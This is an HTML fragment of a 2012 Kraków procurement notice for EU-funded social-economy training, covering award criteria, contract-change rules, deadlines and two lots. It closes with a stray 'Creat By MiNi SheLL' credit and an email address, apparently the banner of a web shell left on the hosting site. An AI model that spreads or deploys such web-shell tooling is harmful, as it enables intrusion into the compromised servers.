<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 65</li>
<li>2 - doświadczenie w przeprowadzaniu szkoleń - 35</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I. W przypadku zmiany stawki podatku od towarów i usług w trakcie obowiązywania niniejszej umowy, kwota brutto określona w ust. 1 nie ulegnie zmianie, a Strony zawrą aneks do niniejszej umowy stosownie korygujący kwotę netto oraz kwotę podatku od towarów i usług. II. Poza przypadkami wskazanymi w  umowie oraz w art. 144 ust. 1 ustawy Prawo zamówień publicznych, zmiana postanowień  umowy w stosunku do treści oferty,na podstawie której dokonano wyboru Wykonawcy, jest dopuszczalna na zasadach wskazanych w ust. 2-6, jeżeli:
1) polega na zmianie trenera, zgodnie z § 7  umowy,
2) polega na zmianie obiektu lub sali szkoleniowej, zgodnie z § 7  umowy,
3) polega na zmianie terminu realizacji danej usługi szkoleniowej w przypadkach innych, niż określone w § 3  umowy,
4) prowadzi do obniżenia kosztów realizacji umowy lub jest w inny sposób korzystna dla Zamawiającego,
5) jest uzasadniona zmianą przepisów prawa, lub
6) wynika z innych szczególnych okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. 
Każda ze stron przedkładając drugiej stronie propozycję zmiany, spełniającą wymogi określone w ust. 1, wraz z tą propozycją przedłoży: 1) opis proponowanej zmiany, 2) zakres proponowanej zmiany, 3) szacunki, czy i w jaki sposób zakładana zmiana wpłynie na termin realizacji przedmiotu umowy, oraz 4) szacunki dotyczące wpływu zmiany na wynagrodzenie należne Wykonawcy wraz z uzasadnieniem. 3. Po otrzymaniu propozycji, Wykonawca albo Zamawiający (w zależności od przypadku) w terminie 3 dni zatwierdzi bądź odrzuci otrzymaną propozycję zmiany, bądź w tym terminie wystąpi do strony występującej z propozycją zmiany, przesyłając zmodyfikowaną propozycję zmiany, spełniającą wymogi opisane w ust. 2. 4. W przypadku upływu terminu podanego w ust. 3, traktuje się, iż propozycja wprowadzenia zmiany została odrzucona. 5. Do przesłanej zmodyfikowanej propozycji zmiany ust. 3-4 stosuje się odpowiednio. 6. Każda zmiana do umowy wymaga formy pisemnej pod rygorem nieważności. 7. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tychże okolicznościach. 8. W przypadku, o którym mowa w ust. 7, Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu rzeczywistego wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> REGIONALNY OŚRODEK POLITYKI SPOŁECZNEJ W KRAKOWIE, ul. Piastowska 32, 30-070 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2012 godzina 11:00, miejsce: REGIONALNY OŚRODEK POLITYKI SPOŁECZNEJ W KRAKOWIE, ul. Piastowska 32, 30-070 Kraków, w sekretariacie (pok. nr 7, I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest realizowane w ramach i na potrzeby Projektu: Akademia Rozwoju Ekonomii Społecznej - Etap I realizowanego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII - Promocja integracji społecznej, Działanie 7.2 - Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Poddziałanie 7.2.2. - Wsparcie ekonomii społecznej.
Współfinansowanie: Środki Europejskiego Funduszu Społecznego stanowią 85% ogólnych środków przeznaczonych na realizację zamówienia. W pkt.II.2) ogłoszenia powinno być:Realizacja całości zamówienia odbywać się będzie w okresie od dnia zawarcia umowy w sprawie niniejszego zamówienia najpóźniej do dnia 14 grudnia 2012 roku, z tym że poszczególne szkolenia powinny zostać wykonane w następujących terminach:
Część I zamówienia: 
-Szkolenie nr 1 - kwiecień, wrzesień 2012 r.
-Szkolenie nr 2 - maj, październik 2012 r. 
-Szkolenie nr 3 - czerwiec, wrzesień 2012 r. 
-Szkolenie nr 4 - lipiec, listopad 2012 r. 
-Szkolenie nr 5 - sierpień, grudzień 2012 r. 
Część II zamówienia:
-Szkolenie nr 6 - kwiecień, wrzesień 2012 r. 
-Szkolenie nr 7 - maj, październik 2012 r. 
-Szkolenie nr 8 - czerwiec, listopad 2012r. 
-Szkolenie nr 9 - lipiec, październik 2012 r. 
-Szkolenie nr 10 - sierpień, grudzień 2012 r.
Zamawiający zastrzega, iż terminy powyższe są przybliżone. Szczegółowy termin wykonania poszczególnych usług szkolenia zostanie wskazany przez Zamawiającego nie później niż 21 dni przed datą danego szkolenia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I zamówienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) przeprowadzenie wymienionych w pkt. 3.3.1. Części I SIWZ szkoleń z zakresu praktycznych aspektów prowadzenia przedsiębiorstwa społecznego, skierowanych do osób prowadzących działalność w formie spółdzielni socjalnej oraz przedstawicieli podmiotów ekonomii społecznej - dla wskazanych grup uczestników rekrutowanych przez Zamawiającego, na warunkach określonych w pkt. 3.4.1. Części I SIWZ,
2) opracowanie kompletu materiałów szkoleniowych dla uczestników oraz ich wydrukowanie/powielenie w liczbie odpowiadającej ilości uczestników zakwalifikowanych do udziału w szkoleniu - na warunkach określonych w pkt. 3.4.2. Części I SIWZ,
3) zapewnienie sali szkoleniowej - na warunkach wskazanych w pkt. 3.4.3. Części I SIWZ,
4) zapewnienie w trakcie szkoleń cateringu - na warunkach wskazanych w pkt. 3.4.4. Części I SIWZ.
Szczegółowy opis przedmiotu zamówienia znajduje się w Części III SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Doświadczenie w przeprowadzaniu szkoleń - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II zamówienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) przeprowadzenie wymienionych w pkt. 3.3.2. Części I SIWZ szkoleń z zakresu podstaw funkcjonowania podmiotów ekonomii społecznej, w szczególności przedsiębiorstw społecznych, skierowanych do osób fizycznych, które chcą założyć spółdzielnię socjalną oraz zainteresowanych tą tematyką, w tym przedstawicieli jednostek samorządu terytorialnego, urzędów i instytucji rynku pracy oraz pomocy społecznej - dla wskazanych grup uczestników rekrutowanych przez Zamawiającego, na warunkach określonych w pkt. 3.4.1. Części I SIWZ,
2) opracowanie kompletu materiałów szkoleniowych dla uczestników oraz ich wydrukowanie/powielenie w liczbie odpowiadającej ilości osób zakwalifikowanych do udziału w szkoleniu - na warunkach określonych w pkt. 3.4.2. Części I SIWZ,
3) zapewnienie sali szkoleniowej - na warunkach wskazanych w pkt. 3.4.3. Części I SIWZ,
4) zapewnienie w trakcie szkoleń cateringu - na warunkach wskazanych w pkt. 3.4.4. Części I SIWZ.
Szczegółowy opis przedmiotu zamówienia znajduje się w Części III SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com